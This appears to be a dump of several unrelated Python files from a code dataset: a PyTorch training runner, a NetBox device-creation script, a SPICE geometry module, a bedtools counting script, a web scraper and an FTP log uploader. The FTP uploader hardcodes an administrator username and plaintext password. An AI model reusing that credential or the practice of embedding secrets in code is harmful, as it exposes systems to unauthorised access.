model.model as model_arch\n\n # displaying the config fie\n for line in pprint.pformat(config).split(\"\\n\"):\n logger.info(line)\n\n # setup seed for reproducibility of results\n setup_seed(config[\"seed\"])\n\n # create model instance\n model = get_instance(model_arch, \"arch\", config)\n\n # setup model with device\n model, device = setup_device(model, 
config[\"target_device\"])\n\n model_params = setup_model_params(model, config[\"optimizer\"])\n\n optimizer = get_instance(optim, \"optimizer\", config, model_params)\n\n self.transforms = get_instance(augmentations, \"transforms\", config)\n\n # train and test dataloaders\n self.data_loader = get_instance(\n model_data_loaders, \"data_loader\", config, self.transforms\n )\n\n train_loader, test_loader = self.data_loader.get_loaders()\n\n # Loss Function\n criterion = getattr(model_loss, config[\"criterion\"])\n\n batch_scheduler = False\n if config[\"lr_scheduler\"][\"type\"] == \"OneCycleLR\":\n print(\"OneCycleLR\")\n logger.info(\"Building: torch.optim.lr_scheduler.OneCycleLR\")\n max_at_epoch = config[\"lr_scheduler\"][\"max_lr_at_epoch\"]\n pct_start = (\n max_at_epoch / config[\"training\"][\"epochs\"] if max_at_epoch else 0.8\n )\n scheduler_config = config[\"lr_scheduler\"][\"args\"]\n lr_scheduler = torch.optim.lr_scheduler.OneCycleLR(\n optimizer,\n max_lr=scheduler_config[\"max_lr\"],\n steps_per_epoch=len(train_loader),\n pct_start=pct_start,\n epochs=config[\"training\"][\"epochs\"],\n )\n batch_scheduler = True\n else:\n lr_scheduler = get_instance(\n model_scheduler, \"lr_scheduler\", config, optimizer\n )\n\n logger.info(\"Intializing the Trainer\")\n self.trainer = Trainer(\n model,\n optimizer,\n criterion,\n config,\n device,\n train_loader,\n test_loader,\n lr_scheduler=lr_scheduler,\n batch_scheduler=batch_scheduler,\n )\n\n def model_summary(self, input_size):\n summary(self.trainer.model, input_size)\n\n def plot_metrics(self):\n logger.info(\"Plotting the Metrics.\")\n plt = plot.model_metrics(self.trainer.train_metric, self.trainer.test_metric)\n plot.plot_lr_metric(self.trainer.lr_metric)\n\n return plt\n\n def plot_gradcam(self, target_layers):\n logger.info(\"Plotting GradCAM.\")\n\n data, target = next(iter(self.trainer.test_loader))\n data, target = data.to(self.trainer.device), target.to(self.trainer.device)\n\n logger.info(\"Plotting for 5 Samples.\")\n data = data[:5]\n target = target[:5]\n\n # get generated GradCAM data\n gcam_layers, predicted_probs, predicted_classes = get_gradcam(\n data, target, self.trainer.model, self.trainer.device, target_layers\n )\n\n # get the denomarlization function\n unorm = augmentations.UnNormalize(\n mean=self.transforms.mean, std=self.transforms.std\n )\n plot_gradcam(\n gcam_layers,\n data,\n target,\n predicted_classes,\n self.data_loader.class_names,\n unorm,\n )\n\n def plot_misclassified(self, target_layers):\n\n assert self.trainer.model is not None\n logger.info(\"Model Misclassified Images.\")\n misclassified = []\n misclassified_target = []\n misclassified_predictions = []\n\n model, device = self.trainer.model, self.trainer.device\n\n model.eval()\n\n with torch.no_grad():\n for data, target in self.trainer.test_loader:\n data, target = data.to(device), target.to(device)\n output = model(data)\n predictions = output.argmax(dim=1, keepdim=True)\n misclassified_list = target.eq(predictions.view_as(target)) == False\n\n misclassified.append(data[misclassified_list])\n misclassified_target.append(target[misclassified_list])\n misclassified_predictions.append(predictions[misclassified_list])\n\n misclassified = torch.cat(misclassified)\n misclassified_target = torch.cat(misclassified_target)\n misclassified_predictions = torch.cat(misclassified_predictions)\n\n logger.info(\"Selecting 25 misclassified Samples.\")\n\n data = misclassified[:25]\n target = misclassified_target[:25]\n\n # get generated GradCAM data\n 
gcam_layers, predicted_probs, predicted_classes = get_gradcam(\n data, target, self.trainer.model, self.trainer.device, target_layers\n )\n\n # get denormalization function\n unorm = augmentations.UnNormalize(\n mean=self.transforms.mean, std=self.transforms.std\n )\n\n plot_gradcam(\n gcam_layers,\n data,\n target,\n predicted_classes,\n self.data_loader.class_names,\n unorm,\n )\n\n def find_lr(self):\n logger.info(\"Finding best Learning Rate.\")\n config = self.config\n\n if self.custom_model is True:\n import model.custom_model as model_arch\n\n print(\"custom_model\")\n else:\n import model.model as model_arch\n\n print(\"local_model\")\n\n # setup seed for reproducibility of results\n setup_seed(config[\"seed\"])\n\n # create model instance\n model = get_instance(model_arch, \"arch\", config)\n\n # setup model with device\n model, device = setup_device(model, config[\"target_device\"])\n\n model_params = setup_model_params(model, config[\"optimizer\"])\n optimizer = get_instance(optim, \"optimizer\", config, model_params)\n\n # self.transforms = get_instance(augmentations, \"transforms\", config)\n\n # Loss Function\n criterion = getattr(model_loss, config[\"criterion\"])\n\n self.lr_finder = LRFinder(model, optimizer, criterion, device=\"cuda\")\n\n lr_finder_epochs = config[\"lr_finder\"][\"epochs\"]\n\n self.lr_finder.range_test(\n self.trainer.train_loader,\n start_lr=1e-3,\n end_lr=1,\n num_iter=len(self.trainer.test_loader) * lr_finder_epochs,\n step_mode=\"linear\",\n )\n\n self.best_lr = self.lr_finder.history[\"lr\"][\n self.lr_finder.history[\"loss\"].index(self.lr_finder.best_loss)\n ]\n sorted_lrs = [\n x\n for _, x in sorted(\n zip(self.lr_finder.history[\"loss\"], self.lr_finder.history[\"lr\"])\n )\n ]\n\n logger.info(f\"sorted lrs: {sorted_lrs[:10]}\")\n logger.info(f\"best lr: {self.best_lr}\")\n logger.info(\"plotting lr_finder\")\n\n self.lr_finder.plot()\n\n # reset the model and optimizer\n self.lr_finder.reset()\n plt.show()\n\n del model, optimizer, criterion\n\n def train_lr(self, use_best_lr=False, lr_value=None):\n\n if use_best_lr and self.best_lr is not None:\n logger.info(f\"Using max_lr: {self.best_lr}\")\n logger.info(f\"Using min_lr: {self.best_lr/30}\")\n logger.info(f\"Using initial_lr: {self.best_lr/20}\")\n for param_group in self.trainer.optimizer.param_groups:\n param_group[\"lr\"] = self.best_lr / 10\n param_group[\"max_lr\"] = self.best_lr\n param_group[\"min_lr\"] = self.best_lr / 30\n param_group[\"initial_lr\"] = self.best_lr / 20\n\n if not use_best_lr and lr_value is not None:\n for param_group in self.trainer.optimizer.param_groups:\n param_group[\"lr\"] = lr_value\n\n self.trainer.train()\n logger.info(\"Finished.\")\n\n def find_lr1(self):\n from torch_lr_finder import LRFinder as LR_Finder\n\n logger.info(\"Finding best Learning Rate.\")\n config = self.config\n\n if self.custom_model is True:\n import model.custom_model as model_arch\n\n print(\"custom_model\")\n else:\n import model.model as model_arch\n\n print(\"local_model\")\n\n # setup seed for reproducibility of results\n setup_seed(config[\"seed\"])\n\n # create model instance\n model = get_instance(model_arch, \"arch\", config)\n\n # setup model with device\n model, device = setup_device(model, config[\"target_device\"])\n\n model_params = setup_model_params(model, config[\"optimizer\"])\n optimizer = get_instance(optim, \"optimizer\", config, model_params)\n\n # self.transforms = get_instance(augmentations, \"transforms\", config)\n\n # Loss Function\n criterion = 
getattr(model_loss, config[\"criterion\"])()\n\n        self.lr_finder = LR_Finder(model, optimizer, criterion, device=\"cuda\")\n\n        lr_finder_epochs = config[\"lr_finder\"][\"epochs\"]\n        logger.info(f\"Running LR-Test for {lr_finder_epochs} epochs\")\n        # my method\n        self.lr_finder.range_test(\n            self.trainer.train_loader,\n            start_lr=1e-3,\n            end_lr=1,\n            num_iter=len(self.trainer.test_loader) * lr_finder_epochs,\n            step_mode=\"linear\",\n        )\n\n        # leslie smith method\n        # self.lr_finder.range_test(self.trainer.train_loader, val_loader = self.trainer.test_loader,\n        # end_lr=1, num_iter=len(self.trainer.train_loader), step_mode='linear')\n\n        # fast ai method\n        # self.lr_finder.range_test(\n        #     self.trainer.train_loader, end_lr=100, num_iter=len(self.trainer.train_loader))\n\n        self.best_lr = self.lr_finder.history[\"lr\"][\n            self.lr_finder.history[\"loss\"].index(self.lr_finder.best_loss)\n        ]\n\n        sorted_lrs = [\n            x\n            for _, x in sorted(\n                zip(self.lr_finder.history[\"loss\"], self.lr_finder.history[\"lr\"])\n            )\n        ]\n\n        logger.info(f\"sorted lrs : {sorted_lrs[:10]}\")\n\n        logger.info(f\"found the best lr : {self.best_lr}\")\n\n        logger.info(\"plotting lr_finder\")\n\n        plt.style.use(\"dark_background\")\n        self.lr_finder.plot()\n\n        # reset the model and the optimizer\n        self.lr_finder.reset()\n        plt.show()\n\n        del model, optimizer, criterion\n","sub_path":"TinyImageNet/Session1/dl_vision/runner/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":11438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"169521808","text":"#coding=utf-8\nimport shutil\nimport os\nfrom ftplib import FTP\nimport os\nimport tarfile\n\ndef LogUpload(LogName):\n    ftp = FTP()\n    timeout = 30\n    port = 21\n    ftp.connect('192.168.1.100', port, timeout)\n    ftp.login('administrator', 'yakai888')\n    print(ftp.getwelcome())\n\n    #ftp.mkd(\"TestLog/log\") # create a new folder\n    ftp.cwd(\"TestLog/PowerBoard\") # set the working directory\n\n    localpath = \"/home/pi/Desktop/work/Finalversion/Moto/\"\n    localfile = localpath + LogName + '.csv'\n    f=open(localfile,'rb')\n\n    ftp.storbinary('STOR %s' % os.path.basename(localfile),f)\n","sub_path":"MotoBoard/LogUpload.py","file_name":"LogUpload.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"582969305","text":"#!/usr/bin/env python3\n# -*- coding: utf-8\n\nimport sys\nimport numpy\nimport scipy.stats as stats\n\n\ndef average_and_ci(data, confidence_level = .95):\n\tavg = numpy.average(data)\n\tstd = numpy.std(data, ddof=1)\n\tp = 1.0 - (1.0-confidence_level)/2\n\tconfidence_interval = stats.t.ppf(p, len(data)-1)*std/(len(data)**0.5)\n\treturn (avg, confidence_interval)\n\n\ndef read_float_values_from_file(file, field):\n\tv = []\n\tfor line in file:\n\t\tif line != \"\" and line[0] != '*':\n\t\t\ttry:\n\t\t\t\tspl = line.strip().split()\n\t\t\t\tif len(spl) < field:\n\t\t\t\t\tprint ('Invalid field at line:', line, file=sys.stderr)\n\t\t\t\telse:\n\t\t\t\t\tv.append(float(spl[field - 1]))\n\t\t\texcept:\n\t\t\t\tpass\n\treturn v\n\n\n# Main program\n\n\nfield = 1\n\nif len(sys.argv) == 2:\n    field = int(sys.argv[1])\nvalues = read_float_values_from_file(sys.stdin, field)\n(m, ci) = average_and_ci(values, 0.95)\nprint (\"%.3f ± %.3f\" % (m, ci))\n#print (\"%.3f\" % m)\n\n\n\n\n","sub_path":"nerre/scripts/avg_ci.py","file_name":"avg_ci.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"132119001","text":"from django.utils.text import slugify\nfrom django.contrib.contenttypes.models import ContentType\nfrom tenancy.models import Tenant\nfrom dcim.choices import DeviceStatusChoices, SiteStatusChoices\nfrom dcim.models import Device, DeviceRole, DeviceType, Manufacturer, Site, Rack, Interface\nfrom ipam.models import Aggregate, IPAddress, Prefix, RIR, Role, RouteTarget, Service, VLAN, VLANGroup, VRF\nfrom extras.scripts import *\nfrom extras.models import CustomField\nfrom utilities.forms import (\n APISelect, APISelectMultiple, add_blank_choice, BootstrapMixin, BulkEditForm, BulkEditNullBooleanSelect,\n ColorSelect, CommentField, CSVChoiceField, CSVContentTypeField, CSVModelChoiceField, CSVModelForm,\n DynamicModelChoiceField, DynamicModelMultipleChoiceField, ExpandableNameField, form_from_model, JSONField,\n NumericArrayField, SelectWithPK, SmallTextarea, SlugField, StaticSelect2, StaticSelect2Multiple, TagFilterField,\n BOOLEAN_WITH_BLANK_CHOICES,\n)\nfrom CMDBuildNLMK import CMDBuildNLMK as cmdb\n\nclass createSGJuniperSwitch(Script):\n class Meta:\n name = 'Create Juniper switch for SG sites'\n description = 'Create Juniper switch for SG sites'\n field_order = ['site','rack','sw_name','sw_int_name','sw_int_ip']\n\n SERVICESLIST = (\n ('s2','SSHv2'),\n ('s1','SSHv1'),\n ('t','Telnet'),\n ('y','YANG'),\n ('r','REST'),\n )\n \n location = StringVar(\n description = 'Location place',\n label = 'Location',\n required = False\n )\n\n inventory = StringVar(\n description = 'Inventory number',\n label = 'Inventory number NOT USE',\n required = False\n )\n\n sticker = StringVar(\n description = 'Stick number NOT USE',\n label = 'Stick number',\n required = False\n )\n\n dev_name = StringVar(\n description = 'Switch name',\n label = 'Device name'\n )\n\n dev_serial = StringVar(\n description = 'Serial number',\n label = 'Serial number'\n )\n\n dev_model = ObjectVar(\n model = DeviceType,\n label = 'Device model',\n description = 'Device model',\n display_field = 'model',\n query_params = {\n 'manufacturer_id' : '73'\n }\n )\n\n site = ObjectVar(\n model = Site,\n description = 'Site',\n display_field = 'name',\n query_params = {\n 'tenant' : 'sg'\n }\n )\n\n rack = ObjectVar(\n model = Rack,\n description = 'Rack',\n display_field = 'name',\n query_params = {\n 'site_id' : '$site'\n }\n )\n\n position = IntegerVar(\n description = 'Unit',\n widget=APISelect(\n api_url='/api/dcim/racks/{{rack}}/elevation/',\n attrs={\n 'disabled-indicator': 'device',\n 'data-query-param-face': \"[\\\"$face\\\"]\",\n }\n )\n\n )\n\n mgmt_int_name = StringVar(\n description = 'MGMT vlan name',\n label = 'MGMT virtual interface name'\n\n )\n\n mgmt_int_ip = StringVar(\n description = 'with CIDR, example 10.1.1.1/24',\n label = 'MGMT ip address'\n\n\n )\n\n monitoring = BooleanVar(\n description = 'Set to monitoring NOT USE',\n default = 'True'\n )\n\n backup = BooleanVar(\n description = 'Set to backup NOT USE',\n default = 'True'\n\n )\n\n services = MultiChoiceVar(label = 'Services', description = 'multiselect allow', choices=SERVICESLIST)\n\n\n def run(self,data,commit):\n\n services_list = [\n {'id_s':'s2','port':22,'name':'SSHv2','protocol':'tcp'},\n {'id_s':'s1','port':22,'name':'SSHv1','protocol':'tcp'},\n {'id_s':'t','port':23,'name':'Telnet','protocol':'tcp'},\n {'id_s':'y','port':443,'name':'YANG','protocol':'tcp'},\n {'id_s':'r','port':443,'name':'REST','protocol':'tcp'},\n ]\n\n\n dev_role = DeviceRole.objects.get(slug = 'access-switch')\n device_new = Device(\n name = 
data['dev_name'],\n device_type = data['dev_model'],\n site = data['site'],\n rack = data['rack'],\n position = data['position'],\n device_role = dev_role,\n serial = data['dev_serial'],\n )\n device_new.save()\n\n #device_new.custom_field_data['fMonitoring'] = data['monitoring']\n #device_new.custom_field_data['fBackup'] = data['backup']\n device_new.custom_field_data['device_location'] = data['location']\n device_new.save()\n\n output = []\n for iServ in data['services']:\n output.append(iServ)\n print(output)\n res = [row for row in services_list if row['id_s'] == iServ]\n s1 = Service(\n device = device_new,\n name = res[0]['name'],\n ports = [res[0]['port']],\n protocol = res[0]['protocol'],\n )\n s1.save()\n\n\n dev_mgmt_int = Interface(\n device = device_new,\n name = data['mgmt_int_name'],\n type = 'virtual',\n )\n dev_mgmt_int.save()\n\n ipa_type = ContentType.objects.get(app_label='dcim',model='interface')\n ipa = IPAddress(\n address = data['mgmt_int_ip'],\n assigned_object_id = dev_mgmt_int.id,\n assigned_object_type = ipa_type,\n )\n ipa.save()\n\n device_new.primary_ip4 = ipa\n\n device_new.save()\n\n self.log_success(f\"Created new Juniper device: {device_new}\")\n\n\n try:\n c1 = cmdb(username=\"\",password=\"\") #TEST!!!!\n r1 = c1.connect()\n self.log_success(f\"CMDB connect: {r1}\")\n\n new_card = {\n \"Code\": device_new.name,\n \"Hostname\": device_new.name,\n \"Availability\":72,\n \"State\":121,\n \"SerialNumber\": device_new.serial,\n \"Notes\":\"TEST API from NetBOX scripts\",\n }\n \n r4 = c1.insert_card_NetworkBox(card_data = new_card)\n self.log_success(f\"CMDB connect: {r4}\")\n r2 = c1.close()\n except:\n self.log_success(f\"CMDB item not create\") #TEST!!!\n\n \n\n\n\n return ''.join(output)\n","sub_path":"createSGJuniperSwitch.py","file_name":"createSGJuniperSwitch.py","file_ext":"py","file_size_in_byte":6284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"168572407","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.5 (3350)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/mcosta/Dropbox/SPICE/SPICE_CROSS_MISSION/spiops/spiops/classes/body.py\n# Compiled at: 2018-07-19 04:54:11\n# Size of source mod 2**32: 11574 bytes\nimport spiceypy as cspice, numpy as np\nfrom spiops.utils import utils\n\nclass Body(object):\n\n def __init__(self, body, time=object(), target=None):\n if isinstance(body, str):\n name = body\n id = cspice.bodn2c(body)\n else:\n id = body\n name = cspice.bodc2n(body)\n if target:\n self.target = target\n self.name = name\n self.id = id\n self.time = time\n self.previous_tw = []\n self.geometry_flag = False\n\n def __getattribute__(self, item):\n if item in ('altitude', 'distance', 'zaxis_target_angle', 'zaxis_earth_angle'):\n self._Body__Geometry()\n return object.__getattribute__(self, item)\n else:\n if item in ('sa_ang_p', 'sa_ang_n', 'sa_ang', 'saa_sa', 'saa_sc', 'hga_earth',\n 'hga_el_az'):\n self._Body__Structures()\n return object.__getattribute__(self, item)\n return object.__getattribute__(self, item)\n\n def __getattr__(self, item):\n if item in ('state_in_window', ):\n self._Body__StateInWindow()\n return object.__getattribute__(self, item)\n\n def State(self, target=False, reference_frame=False, current=False):\n if self.target and not target and not reference_frame:\n target = self.target.name\n reference_frame = self.target.frame\n if not self.target:\n if target is False:\n target = 'J2000'\n if 
reference_frame is False:\n reference_frame = 'J2000'\n self.trajectory_reference_frame = reference_frame\n if not current:\n current = self.time.current\n state, lt = cspice.spkezr(target, current, reference_frame, self.time.abcorr, self.name)\n return state\n\n def Orientation(self, frame='', target_frame='', current=False, format='msop quaternions'):\n if self.target and not target_frame:\n target_frame = self.target.frame\n if not self.target and not target_frame:\n target_frame = 'J2000'\n if not frame:\n frame = self.frame\n if not current:\n current = self.time.current\n else:\n current = current\n rot_mat = cspice.pxform(target_frame, frame, current)\n if format == 'spice quaternions':\n orientation = cspice.m2q(rot_mat)\n if format == 'msop quaternions':\n quaternions = cspice.m2q(rot_mat)\n orientation = [-quaternions[1],\n -quaternions[2],\n -quaternions[3],\n quaternions[0]]\n else:\n if format == 'euler angles':\n orientation = cspice.m2eul(rot_mat, 3, 2, 1)\n elif format == 'rotation matrix':\n orientation = rot_mat\n return orientation\n\n def __StateInWindow(self, target=False, reference_frame=False, start=False, finish=False):\n state_in_window = []\n for et in self.time.window:\n state_in_window.append(self.State(target, reference_frame, et))\n\n self.state_in_window = state_in_window\n\n def __Structures(self):\n if self.structures_flag is True and self.time.window.all() == self.previous_tw.all():\n return\n time = self.time\n import spiops\n sa_ang_p_list = []\n sa_ang_n_list = []\n saa_sa_list = []\n saa_sc_list = []\n hga_earth = []\n hga_angles = []\n for et in time.window:\n sa_ang_p = spiops.solar_array_angle('TGO_SA+Z', et)\n sa_ang_n = spiops.solar_array_angle('TGO_SA+Z', et)\n saa = spiops.solar_aspect_angles('TGO', et)\n sa_ang_p_list.append(sa_ang_p)\n sa_ang_n_list.append(sa_ang_n)\n saa_sa_list.append(saa[0])\n saa_sc_list.append(saa[1])\n hga_angles, hga_earth = spiops.hga_angles('MPO', et)\n\n self.sa_ang_p = sa_ang_p_list\n self.sa_ang_n = sa_ang_n_list\n self.sa_ang = [sa_ang_p_list, sa_ang_n_list]\n self.saa_sa = saa_sa_list\n self.saa_sc = saa_sc_list\n self.hga_earth = hga_earth\n self.hga_angles = hga_angles\n self.structures_flag = True\n self.previous_tw = self.time.window\n\n def __Geometry(self):\n distance = []\n altitude = []\n subpoint_xyz = []\n subpoint_pgc = []\n subpoint_pcc = []\n zaxis_target_angle = []\n tar = self.target\n time = self.time\n for et in time.window:\n ptarg, lt = cspice.spkpos(tar.name, et, tar.frame, time.abcorr, self.name)\n vout, vmag = cspice.unorm(ptarg)\n distance.append(vmag)\n spoint, trgepc, srfvec = cspice.subpnt(tar.method, tar.name, et, tar.frame, time.abcorr, self.name)\n subpoint_xyz.append(spoint)\n dist = cspice.vnorm(srfvec)\n altitude.append(dist)\n spglon, spglat, spgalt = cspice.recpgr(tar.name, spoint, tar.radii_equ, tar.flat)\n spglon *= cspice.dpr()\n spglat *= cspice.dpr()\n subpoint_pgc.append([spglon, spglat, spgalt])\n spcrad, spclon, spclat = cspice.reclat(spoint)\n spclon *= cspice.dpr()\n spclat *= cspice.dpr()\n subpoint_pcc.append([spcrad, spclon, spclat])\n obs_tar, ltime = cspice.spkpos(tar.name, et, 'J2000', time.abcorr, self.name)\n obs_zaxis = [0, 0, 1]\n try:\n matrix = cspice.pxform(self.frame, 'J2000', et)\n vecout = cspice.mxv(matrix, obs_zaxis)\n zax_target_angle = cspice.vsep(vecout, obs_tar)\n zax_target_angle *= cspice.dpr()\n zaxis_target_angle.append(zax_target_angle)\n except:\n zaxis_target_angle.append(0.0)\n\n self.distance = distance\n self.altitude = altitude\n 
self.subpoint_xyz = subpoint_xyz\n self.subpoint_pgc = subpoint_pgc\n self.subpoint_pcc = subpoint_pcc\n self.zaxis_target_angle = zaxis_target_angle\n self.geometry_flag = True\n self.previous_tw = self.time.window\n\n def Plot(self, yaxis='distance', date_format='TDB', external_data=[], notebook=False):\n self._Body__Geometry()\n self._Body__Structures()\n if yaxis == 'sa_ang':\n yaxis_name = [\n 'sa_ang_p', 'sa_ang_n']\n else:\n if yaxis == 'saa_sc':\n yaxis_name = [\n 'saa_sc_x', 'saa_sc_y', 'saa_sc_z']\n else:\n if yaxis == 'saa_sa':\n if self.name != 'MPO':\n yaxis_name = [\n 'saa_sa_p', 'saa_sa_n']\n else:\n yaxis_name = [\n 'saa_sa']\n else:\n if yaxis == 'hga_angles':\n yaxis_name = [\n 'hga_el', 'hga_az']\n else:\n yaxis_name = yaxis\n utils.plot(self.time.window, self.__getattribute__(yaxis), notebook=notebook, external_data=external_data, yaxis_name=yaxis_name, mission=self.name, target=self.target.name, date_format=date_format)\n\n def Plot3D(self, data='trajectory', reference_frame=False):\n if not self.state_in_window:\n self._Body__StateInWindow(reference_frame=reference_frame)\n data = self.state_in_window\n utils.plot3d(data, self, self.target)\n\n\nclass Target(Body):\n\n def __init__(self, body, time=object(), target=False, frame='', method='INTERCEPT/ELLIPSOID'):\n \"\"\"\n\n :param body:\n :type body:\n :param time:\n :type time:\n :param target: It no target is provided the default is 'SUN'\n :type target:\n :param frame:\n :type frame:\n :param method:\n :type method:\n \"\"\"\n if not target:\n target = Target('SUN', time=time, target=object())\n super(Target, self).__init__(body, time=time, target=target)\n if not frame:\n self.frame = 'IAU_{}'.format(self.name)\n else:\n self.frame = frame\n self.method = method\n self._Target__getRadii()\n\n def __getRadii(self):\n try:\n self.radii = cspice.bodvar(self.id, 'RADII', 3)\n except:\n print('Ephemeris object has no radii')\n return\n\n self.radii_equ = self.radii[0]\n self.radii_pol = self.radii[2]\n self.flat = (self.radii_equ - self.radii_pol) / self.radii_equ\n\n\nclass Observer(Body):\n\n def __init__(self, body, time=object(), target=False, frame=''):\n super(Observer, self).__init__(body, time=time, target=target)\n if not frame:\n self.frame = '{}_SPACECRAFT'.format(self.name)\n if cspice.namfrm(self.frame) == 0:\n self.frame = self.name\n if cspice.namfrm(self.frame) == 0:\n self.frame = '{}_LANDER'.format(self.name)\n print('The frame name has not been able to be built; please introduce it manually')\n else:\n self.frame = frame","sub_path":"pycfiles/spiops-0.4.4-py3-none-any/body.cpython-35.py","file_name":"body.cpython-35.py","file_ext":"py","file_size_in_byte":9491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"555169360","text":"#! 
/usr/bin/env python\n# encoding: utf-8\nfrom bsub import bsub\nfrom pybedtools import BedTool\nfrom toolshed import reader\nimport os\nimport os.path as op\nimport pandas as pd\nimport sys\nimport fnmatch\n\ndef getfilelist(path, pattern):\n files = []\n for root, dirnames, filenames in os.walk(path):\n for filename in fnmatch.filter(filenames, pattern):\n files.append(op.join(root, filename))\n return files\n\ndef counts(samples, result_path, peak_ext, bam_ext):\n # get the consensus peaks\n f = open(\"%s/peak_coordinates.bed\" % result_path, 'w')\n x = BedTool()\n consensus = x.multi_intersect(i=getfilelist(result_path, \"*%s\" % peak_ext))\n for c in consensus:\n # fixing formatting from bedtool object\n replicate_counts = c.name\n if replicate_counts < 2: continue\n \n fields = [c.chrom, c.start, c.stop, \"%s:%d-%d\\n\" % \\\n (c.chrom, c.start, c.stop)]\n f.write(\"\\t\".join(map(str, fields)))\n f.close()\n # get counts for each sample\n jobs = []\n countfiles = []\n for sample in samples:\n bams = getfilelist(result_path, sample + \"*%s\" % bam_ext)\n assert(len(bams) == 1)\n outdir = result_path.rstrip(\"/\") + \"/\" + sample\n countsresult = outdir + \"/\" + sample + \".counts\"\n countfiles.append(countsresult)\n if op.exists(countsresult): continue\n cmd = \"bedtools coverage -abam %s -b %s > %s\" % \\\n (bams[0], f.name, countsresult)\n jobid = bsub(sample + \"_counts\", \n R=\"select[mem>16] rusage[mem=16] span[hosts=1]\",\n verbose=True)(cmd)\n jobs.append(jobid)\n bsub.poll(jobs)\n # counts to matrix\n allcounts = {}\n for cf in countfiles:\n cfname = op.basename(cf).split(\".counts\")[0]\n casecounts = {}\n for toks in reader(cf, header=\"chrom start stop name a_overlaps_in_b \\\n b_with_nonzero length_b frac_b_nonzero\".split()):\n casecounts[toks['name']] = int(toks['a_overlaps_in_b'])\n allcounts[cfname] = casecounts\n countsdf = pd.DataFrame(allcounts)\n countsdf.to_csv(sys.stdout, sep=\"\\t\", header=True)\n\ndef main(args):\n counts(args.samples, args.result_path, args.peak_ext, args.alignment_ext)\n\nif __name__ == \"__main__\":\n import argparse\n p = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter)\n p.add_argument('--samples', required=True, nargs=\"+\", help='sample names')\n p.add_argument('--result_path', required=True, help='parent directory of sample results')\n p.add_argument('--peak_ext', default=\"_peaks.bed\", help=\"file extension to search for [ _peaks.bed ]\")\n p.add_argument('--alignment_ext', default=\".bam\", help=\"file extension to search for [ .bam ]\")\n args = p.parse_args()\n main(args)","sub_path":"archive/leinwand/bin/counts.py","file_name":"counts.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"122934929","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path('', views.example, name='exampl'),\n path('contact/', views.contact, name='contact'),\n path('home/', views.home, name='blog-home'),\n path('contacti/', views.contacti, name='blog-contacti'),\n path('colt/', views.colt, name='colt'),\n]\n","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"378017401","text":"import os\nimport inspect\n\ndef mkdir_if_not_exist(dir_list):\n for directory in dir_list:\n if not os.path.exists(directory):\n os.makedirs(directory)\n\ncurr_filename = inspect.getfile(inspect.currentframe())\nroot_dir = os.path.dirname(os.path.abspath(curr_filename))\n\n\norigin_data_dir = os.path.join(root_dir, 'origin_data')\ntrain_image_aug_dir = os.path.join(origin_data_dir, 'train_image_aug')\ntrain_image_dir = os.path.join(origin_data_dir, 'train_image')\ntest_image_dir = os.path.join(origin_data_dir, 'test_image')\n\ntest_visit_dir = os.path.join(origin_data_dir, 'test_visit')\n\ncached_dir = os.path.join(root_dir, 'cache')\nmkdir_if_not_exist(dir_list=[cached_dir])\n\ntrain_images_npy = os.path.join(cached_dir, 'train_images.npy')\ntrain_labels_npy = os.path.join(cached_dir, 'train_labels.npy')\ntest_images_npy = os.path.join(cached_dir, 'test_images.npy')\n\n\ntrain_ids_npy = os.path.join(cached_dir, 'train_images_ids.npy')\ntrain_visit_dir = os.path.join(origin_data_dir, 'train_visit.npy')\ntrain_visits_origin_npy = os.path.join(cached_dir, 'train_visits_origin.npy')\ntrain_visits_274_npy = os.path.join(cached_dir, 'train_visits_274.npy')\ntrain_visits_224_npy = os.path.join(cached_dir, 'train_visits_224.npy')\n\ntest_ids_npy = os.path.join(cached_dir, 'test_images_ids.npy')\ntest_visit_dir = os.path.join(origin_data_dir, 'test_visit.npy')\ntest_visits_origin_npy = os.path.join(cached_dir, 'test_visits_origin.npy')\ntest_visits_274_npy = os.path.join(cached_dir, 'test_visits_274.npy')\ntest_visits_224_npy = os.path.join(cached_dir, 'test_visits_224.npy')\n\n\n\nmodel_path = os.path.join(root_dir, 'model', 'model.h5')\n\nresult_data_path = os.path.join(root_dir, 'result_data.txt')\n\nvisits_274_new_feature_npy = os.path.join(cached_dir, 'visits_274_new_feature.npy')\nvisits_224_new_feature_npy = os.path.join(cached_dir, 'visits_224_new_feature.npy')","sub_path":"paths.py","file_name":"paths.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"491428700","text":"import requests\nimport json\nfrom bs4 import BeautifulSoup\nfrom pprint import pprint\n\ndef find_hotels(city, checkin, checkout, rooms, guests):\n inc,inb,ina = checkin.split('-')\n outc,outb,outa = checkout.split('-')\n roomConf = ''\n for i in range(int(rooms)):\n roomConf += ('&roomConfig='+guests[i])\n pgno = 1\n hotel_list = []\n hotel_counter = 1\n while True:\n url = 'https://www.oyorooms.com/hotels-in-'+city+'/?checkin='+ina+'%2F'+inb+'%2F'+inc+'&checkout='+outa+'%2F'+outb+'%2F'+outc+'&page='+str(pgno)+roomConf\n print(url)\n\n r = requests.get(url)\n soup = BeautifulSoup(r.text, 'html.parser')\n # print(soup)\n \n hotels = 0\n for row in soup.find_all('div',{'class':'hotelCardListing'}):\n hotels += 1\n info = {}\n info['id'] = hotel_counter\n hotel_counter += 1\n imageSection = 